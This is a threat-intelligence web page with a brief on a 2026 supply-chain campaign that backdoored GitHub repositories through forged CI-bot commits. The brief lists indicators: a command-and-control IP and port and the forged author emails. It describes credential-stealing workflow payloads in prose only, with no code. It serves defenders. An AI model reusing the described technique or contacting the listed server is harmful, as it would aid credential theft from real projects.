DMZ//THREAT INTEL
FEED ACTIVELAST SYNC: 06:03:37ZSOURCES: 14CRITICAL: 15
⚠ ACTIVE ALERTS
SYLVANITE CRITICAL — SYLVANITE is a newly named Dragos-tracked threat group identified as a dedicated… /// @MsftSecIntel CRITICAL — We are tracking TeamPCP (UNC6780) activity following the GitHub internal repository… /// @GossiTheDog CRITICAL — The GitHub / TeamPCP breach is now being monetized on BreachForums. Listing is up — $95k… /// @struppigel CRITICAL — SUPPLY CHAIN ALERT: Laravel-Lang PHP packages backdoored May 22-23 via hijacked GitHub… /// @MalwareHunterTeam CRITICAL — Seeing fresh DebugElevator stealer log batches already appearing for sale on Exploit.in —…
15Critical Threats
8Active CVEs
0IOCs Tracked
0New Advisories
INTEL FEED/ARCHIVE/SUPPLY-CHAIN
DMZ INTEL DESK//FILED: 2026-05-24//16:49Z
CRITICAL#supply chain

Operation Megalodon: Automated Campaign Backdoors 5,561 GitHub Repos via Forged CI Commits in Six Hours, 449GB Exfiltrated

Between 11:36 and 17:48 UTC on May 18, 2026, a campaign tracked as Megalodon (attributed to the TeamPCP syndicate) pushed 5,718 malicious commits to 5,561 GitHub repositories using throwaway accounts and forged author identities mimicking routine CI bots (build-bot, auto-ci, ci-bot, pipeline-bot). Two payload variants were deployed: a mass variant that triggers on every push/PR, and a dormant backdoor variant (Optimize-Build) activatable on-demand via the GitHub API; both exfiltrate cloud credentials, SSH keys, OIDC tokens, and CI secrets to a C2 at 216.126.225.129:8443. As of May 21, the attacker's ingest server showed 575,352 files stolen and 449 GB of exfiltrated data still actively growing — organizations should immediately audit .github/workflows/ directories for unauthorized commits from build-system@noreply.dev or ci-bot@automated.dev and rotate all secrets accessible to affected runners.

This intelligence brief has been compiled from open-source reporting and corroborated across multiple threat intelligence sources. Defenders should treat the critical severity rating as a guide to prioritization within their environment.

For the latest indicators of compromise, formatted SIEM queries, and unredacted actor intelligence related to this brief, DMZ Operator subscribers receive automated IOC packages via email the moment new advisories are published.

FILED UNDER:
megalodon · github-actions · ci-cd-poisoning · supply-chain · teampcp · oidc-abuse · cloud-credentials · npm · tiledesk
STAY AHEAD OF THREATS
Daily intel briefs and IOC packages — delivered to your inbox the moment a new advisory drops.
SUBSCRIBE — $29/MO →
SHARE BRIEF:✕ Post on Xin Share on LinkedIn

RELATED ACTORS

ACTOR
TEAMPCP
CRIMINAL

MORE FROM ARCHIVE

# SUPPLY CHAIN
2026-05-26
Laravel-Lang Composer Packages Backdoored via GitHub Tag Rewrite; 700+ Versions Deliver CI/CD Credential Stealer
# SUPPLY CHAIN
2026-05-25
Laravel-Lang Composer Packages Compromised via Tag-Rewrite Attack — 700+ Malicious Versions Deploy Cross-Platform Credential Stealer Targeting Cloud Keys, CI Tokens, and Crypto Wallets
# SUPPLY CHAIN
2026-05-25
TeamPCP (UNC6780) Mini Shai-Hulud Worm Pivots Through Poisoned Nx Console VS Code Extension to Exfiltrate 3,800 GitHub Internal Repos
# SUPPLY CHAIN
2026-05-24
Laravel-Lang Composer Packages Fully Compromised: 700+ Historical Versions Backdoored with Cross-Platform Credential Stealer via Forked GitHub Tag Poisoning